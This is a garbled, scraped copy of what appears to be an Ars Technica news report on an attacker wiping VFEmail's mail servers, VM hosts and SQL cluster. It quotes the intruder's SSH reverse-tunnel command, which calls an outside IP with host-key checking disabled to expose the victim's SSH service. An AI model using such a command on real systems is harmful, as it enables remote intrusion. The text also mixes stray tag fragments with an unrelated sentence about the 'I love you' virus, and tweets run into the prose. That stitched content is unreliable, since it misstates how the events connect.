VFEmail
of=/dev/
SQL
VM
Virtual Machines
aktv@94.155.49.9
NL
CNMN Collection
WIRED Media Group
Condé Nast
Dan Goodin
Rick Romero
Havokmon
count=399559
Daticum
Coolbox
Ars Technica Addendum
No matching tags
Nast
No matching tags
US
No matching tags
Email provider VFEmail said it has suffered a catastrophic destruction of all of its servers by an unknown assailant who wiped out almost two decades' worth of data and backups in a matter of hours.“Yes, @VFEmail is effectively gone,” VFEmail founder Rick Romero wrote on Twitter Tuesday morning after watching someone methodically reformat hard drives of the service he started in 2001. via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N— VFEmail.net (@VFEmail) February 11, 2019The damage, Romero reported, extended to VFEmail’s “entire infrastructure,” including mail hosts, virtual machine hosts, and a SQL server cluster. The virus got its name because it was transmitted in emails with the subject “I love you.” The service aimed to offer a better email experience by scanning messages for malware on the server.“We strive to build an economical and redundant system, to provide our users with as much uptime as possible,” VFEmail’s about page said. To reformat a sql cluster (whaa?), and hit off-site NL hosted vms at the same time seems pretty nefarious to me.— Havokmon (@Havokmon) February 12, 2019He went on to say that the attacker used multiple means of access onto the VFEmail infrastructure and as a result, it wasn’t clear two-factor authentication would have stopped the intrusion.“2FA only works if the access method was via authentication, as opposed to exploit,” he explained.
As said here by Dan Goodin